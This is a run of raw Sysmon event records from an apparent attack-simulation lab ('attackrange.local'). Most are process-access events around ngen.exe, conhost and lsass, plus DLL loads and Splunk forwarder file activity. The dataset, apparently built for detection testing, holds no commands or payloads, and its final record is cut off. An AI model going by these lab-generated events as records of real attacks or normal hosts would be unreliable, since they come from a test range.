734700x800000000000000074135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.046{A7A01FEF-EBD3-607E-620C-00000000BB01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.030{A7A01FEF-EBD3-607E-630C-00000000BB01}42406852C:\Windows\system32\conhost.exe{A7A01FEF-EBD3-607E-620C-00000000BB01}3596c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.014{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-630C-00000000BB01}4240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.014{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-620C-00000000BB01}3596c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.014{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-620C-00000000BB01}3596c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.999{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-600C-00000000BB01}3192c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.999{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-600C-00000000BB01}3192c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.999{A7A01FEF-EBD2-607E-600C-00000000BB01}3192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 23542300x800000000000000050259Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:23.969{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3AE0661E4A094BDB311D8D53B1A66F2,SHA256=3EC3C11F1B952AD1115E72CA1EBFA37073895A6CE0A854654C2E17B27F87F29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050258Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:23.766{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050257Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:20.717{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52522-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000074421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.718{A7A01FEF-EBD4-607E-B30C-00000000BB01}56484436C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.702{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-B30C-00000000BB01}5648C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.702{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.702{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-B20C-00000000BB01}4856c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.686{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.686{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.686{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.671{A7A01FEF-EBD4-607E-B10C-00000000BB01}60886620C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.671{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-B10C-00000000BB01}6088C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.655{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.655{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-B00C-00000000BB01}3356c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.655{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.655{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.655{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.624{A7A01FEF-EBD4-607E-AF0C-00000000BB01}41485984C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.624{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AF0C-00000000BB01}4148C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.624{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.608{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD4-607E-AE0C-00000000BB01}4800c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.608{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.608{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.608{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.593{A7A01FEF-EBD4-607E-AD0C-00000000BB01}16844380C:\Windows\system32\conhost.exe{A7A01FEF-EBD4-607E-AC0C-00000000BB01}4708c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:24.577{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD4-607E-AD0C-00000000BB01}1684C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 